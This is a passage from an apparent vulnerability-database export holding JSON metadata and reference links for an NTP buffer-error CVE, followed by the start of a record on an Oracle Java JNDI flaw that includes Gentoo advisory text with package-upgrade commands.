Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "BID", "id": "77273" }, { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134137" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-7853", "trust": 3.3 }, { "db": "BID", "id": "77273", "trust": 2.0 }, { "db": "SECTRACK", "id": "1033951", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-211752", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-159-11", "trust": 1.6 }, { "db": "PACKETSTORM", "id": "134082", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "134137", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU95781418", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-007705", "trust": 0.8 }, { "db": "CS-HELP", "id": "SB2021041363", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202104-975", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021061008", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201510-577", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10711", "trust": 0.3 }, { "db": "TALOS", "id": "TALOS-2015-0064", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-7853", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134102", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134034", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "BID", "id": "77273" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "id": "VAR-201708-0036", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.17692308 }, "last_update_date": "2023-12-18T11:25:22.755000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NTP\u00a0Bug\u00a02920 Red hat Red\u00a0Hat\u00a0Bugzilla", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug2920" }, { "title": "NTP Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=119783" }, { "title": "Red Hat: CVE-2015-7853", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7853" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2783-1" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=85311fa037162a48cd67fd63f52a6478" }, { "title": "Symantec Security Advisories: SA103 : October 2015 NTP Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=f5e05389a60d3a56f2a0ad0ec21579d9" }, { "title": "Cisco: Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151021-ntp" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-120", "trust": 1.0 }, { "problemtype": "Buffer error (CWE-119) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "NVD", "id": "CVE-2015-7853" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.8, "url": "http://www.securityfocus.com/bid/77273" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1274262" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/ntpbug2920" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1033951" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0001/" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-211752.pdf" }, { "trust": 1.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-11" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151021-ntp" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2783-1" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00020.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00048.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00026.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00042.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-updates/2015-11/msg00093.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-updates/2016-05/msg00114.html" }, { "trust": 1.0, "url": "http://packetstormsecurity.com/files/134082/freebsd-security-advisory-ntp-authentication-bypass.html" }, { "trust": 1.0, "url": "http://packetstormsecurity.com/files/134137/slackware-security-advisory-ntp-updates.html" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/536737/100/0/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/536760/100/0/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/536796/100/0/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/536833/100/0/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/archive/1/536737/100/100/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/archive/1/536760/100/100/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/archive/1/536796/100/100/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/archive/1/536833/100/100/threaded" }, { "trust": 1.0, "url": "http://www.talosintel.com/vulnerability-reports/" }, { "trust": 1.0, "url": "https://bto.bluecoat.com/security-advisory/sa103" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95781418/index.html" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021061008" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.4, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=41599" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10711" }, { "trust": 0.3, "url": "http://learn.extremenetworks.com/rs/641-vmv-602/images/vn-2015-009_multiple_ntp_vulnerabilities.pdf" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/oct/113" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099225" }, { "trust": 0.3, "url": "http://talosintel.com/reports/talos-2015-0064/" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7702" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7851" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7701" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7855" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7852" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7850" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7854" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7849" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7853" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7871" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7848" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5196" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/120.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7853" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2783-1/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:25.ntp.asc" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/." }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.bz2" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7703" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.bz2" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.bz2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2" }, { "trust": 0.1, "url": "http://www.cs.bu.edu/~goldbe/ntpattack.html" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "http://talosintel.com/vulnerability-reports/" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7705" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5196" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7692" }, { "trust": 0.1, "url": "http://osuosl.org)" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "BID", "id": "77273" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "BID", "id": "77273" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-07T00:00:00", "db": "VULMON", "id": "CVE-2015-7853" }, { "date": "2015-10-21T00:00:00", "db": "BID", "id": "77273" }, { "date": "2017-09-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2015-10-26T19:32:22", "db": "PACKETSTORM", "id": "134082" }, { "date": "2015-10-27T23:30:50", "db": "PACKETSTORM", "id": "134102" }, { "date": "2015-10-21T19:22:22", "db": "PACKETSTORM", "id": "134034" }, { "date": "2015-10-30T23:22:57", "db": "PACKETSTORM", "id": "134137" }, { "date": "2017-08-07T20:29:00.887000", "db": "NVD", "id": "CVE-2015-7853" }, { "date": "2021-04-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202104-975" }, { "date": "2015-10-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-07-16T00:00:00", "db": "VULMON", "id": "CVE-2015-7853" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "77273" }, { "date": "2021-06-10T08:55:00", "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "date": "2021-07-16T13:15:08.360000", "db": "NVD", "id": "CVE-2015-7853" }, { "date": "2021-04-14T00:00:00", "db": "CNNVD", "id": "CNNVD-202104-975" }, { "date": "2021-06-11T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP\u00a0 Buffer Error Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007705" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-202104-975" } ], "trust": 0.6 } }
var-201404-0381
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via vectors related to JNDI. The vulnerability can be exploited over multiple protocols. This issue affects the 'JNDI' sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. (CVE-2014-1876)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201502-12
http://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: February 15, 2015 Bugs: #507798, #508716, #517220, #525464 ID: 201502-12
Synopsis
Multiple vulnerabilities have been found in Oracle's Java SE Development Kit and Runtime Environment, the worst of which could lead to execution of arbitrary code. Please review the CVE identifiers referenced below for details.
Impact
A context-dependent attacker may be able to execute arbitrary code, disclose, update, insert, or delete certain data.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.71"
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.71"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.71"
References
[ 1 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 2 ] CVE-2014-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432 [ 3 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 4 ] CVE-2014-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448 [ 5 ] CVE-2014-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449 [ 6 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 7 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 8 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 9 ] CVE-2014-0454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454 [ 10 ] CVE-2014-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455 [ 11 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 12 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 13 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 14 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 15 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 16 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 17 ] CVE-2014-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463 [ 18 ] CVE-2014-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464 [ 19 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 20 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 21 ] CVE-2014-2401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401 [ 22 ] CVE-2014-2402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402 [ 23 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 24 ] CVE-2014-2409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409 [ 25 ] CVE-2014-2410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410 [ 26 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 27 ] CVE-2014-2413 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413 [ 28 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 29 ] CVE-2014-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420 [ 30 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 31 ] CVE-2014-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422 [ 32 ] CVE-2014-2423 